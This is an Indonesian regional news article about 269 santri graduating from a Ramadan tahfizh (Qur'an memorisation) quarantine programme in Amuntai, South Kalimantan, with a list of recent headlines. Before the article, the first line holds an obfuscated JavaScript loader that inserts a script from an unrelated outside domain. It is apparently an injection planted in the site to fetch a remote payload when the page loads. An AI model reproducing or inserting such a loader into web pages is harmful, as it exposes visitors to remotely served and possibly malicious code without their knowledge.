(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Ikuti Program Tahfizh Ramadhan, 269 Santri Dafwi Amuntai Diwisuda


KANALKALIMANTAN.COM, AMUNTAI – Ratusan santri Darul Furan Wal Ilmi (Dafwi) Amuntai mengikuti wisuda karantina tahfizh Ramadhan 1444 Hijriyah yang digelar di Masjid Sabilillah Muttaqin Keluhan Sungai Malang Amuntai, Rabu (13/4/2023).

Hadir dalam kegiatan ini Asisten 1 Bidang Pemerintahan dan Kesra Khairussalim, Ketua DPRD HSU Almien Ansar Safari, Ketua Pengelolaan Dafwi H Ahmad Fauzi beserta Dewan Penasehat Dafwi H Ramlan dan jajaran.

Jumlah peserta yang mengikuti program karantina menurut catatan totalnya 308 santri. “Kali ini hanya 269 santri yang bisa mengikuti wisuda karena berbagai kendala,” kata Ketua Pengelolaan Dafwi H Ahmad Fauzi.

Ia menambahkan, untuk para santri sendiri tidak hanya berasal dari Kalimantan Selatan (Kalsel), juga ada yang berasal dari luar kalsel, seperti Kalimantan Timur, Kalimantan Tengah, Kalimantan Barat hingga Jawa Timur.

 

Baca juga: Mayat Lelaki Mengapung di Irigasi Martapura Belum Dikenali, Meninggal Lebih dari Dua Hari

Sedangkan untuk pelaksanaan karantina tahfizh ini tidak hanya dilaksanakan menjelang Ramadhan saja, akan tetapi juga dilaksanakan diluar bulan Ramadhan yakni sejak 2021 lalu, dari awal Januari dan Juli.

“Kebetulan tahun 2023 ini jumlah peserta meningkat dari tahun lalu yakni sekitar 92 persen, karena tahun lalu pesertanya 155 orang, sekarang menjadi 269 orang,” imbuhnya.

Ia berharap kedepan, asrama tempat karantina tahfizh dapat terus ditingkatkan, sehingga mampu menampung para santri, meski saat ini hanya menempati beberapa rumah sederhana.

Sementara itu, Pj Bupati HSU melalui Asisten 1 Khairussalim menyampaikan ucapan selamat sekaligus memberikan apresiasi kepada Darul Furan Wal Ilmi Amuntai, atas inisiasi melaksanakan kegiatan yang sangat positif yakni karantina tahfizh.

“Para peserta patut bersyukur, karena di bulan Ramadhan yang penuh rahmat ini mampu mengisinya dengan kegiatan yang sangat baik, yakni menjalin hubungan dengan Al Quran dengan penuh keikhlasan,” katanya.

Baca juga: Hendak Kabur ke Pulau Jawa, Pelaku Penggelapan dari Gunung Mas Diamankan di Pelabuhan Trisakti

Banyak keistimewaan yang diperoleh ketika menjalin hubungan dengan Al Quran, mulai dari membaca, menghafal, mengamalkan, mengajarkan, hingga muthola’ah dan mentadabburinya.

“Zaman boleh berubah dengan berbagai tantangan yang semakin kompleks, namun kita harus tetap berpegang teguh dan menjadikan Al Quran sebagai pandangan dan pegangan hidup kita,” tutupnya.

Disamping penyerahan sertifikat, dalam wisuda tahfizh kali ini juga dibarengi dengan penyerahan hadiah bagi para santri terbaik hafalan, serta santri inspiratif. Karena para peserta karantina Tahfizh Dafwi ini berlatar belakang yang berbeda-beda, mulai dari pelajar, mahasiswa hingga orang dewasa yang berstatus pekerja swasta. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Curi 8 Dus Keju dan HP, DAF Tak Tahu Hendak Jual Kemana

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian dari Reskrim Polsek Banjarmasin Timur berhasil menangkap seorang lelaki yang terlibat… Read More

1 jam ago

2025, Pemkab HSU Bakal Naikan Insentif Ustadz-Ustadzah TPA

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara (HSU) melalui Bagian Kesejehteraan Rakyat (Kesra) Sekretariat… Read More

1 jam ago

Gelar FKP, Usaha Balai Besar Labkesmas Banjarbaru Tingkatan Pelayanan

KANALKALIMANTAN.COM, BANJARBARU - Balai Besar Laboratorium Kesehatan Masyarakat (BB Labkesmas) Banjarbaru Kalimantan Selatan (Kalsel) menerima… Read More

13 jam ago

“Dialektika di Ujung Joran” Dapur Budaya HSS Juara Kompetisi Film Pendek Dispersip Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Kompetisi film pendek yang diselenggarakan Dinas Perpustakaan dan Kearsipan (Dispersip) Provinsi Kalimantan… Read More

13 jam ago

Diduga Timbulkan Aroma Tak Sedap, DLH Banjarbaru Minta Aeris Hotel Cek IPAL

KANALKALIMANTAN.COM, BANJARBARU - Instalasi pengolahan air limbah milik Aeris Hotel diduga mengeluarkan aroma tak sedap.… Read More

14 jam ago

Kasus Penusukan Siswa SMAN 7 Banjarmasin, ABH Dijatuhi Hukuman Pembinaan 1 Tahun

KANALKALIMANTAN.COM, BANJARMASIN - Hakim Pengadilan Negeri (PN) Banjarmasin menyatakan Anak yang Berhadapan dengan Hukum (ABH),… Read More

15 jam ago

This website uses cookies.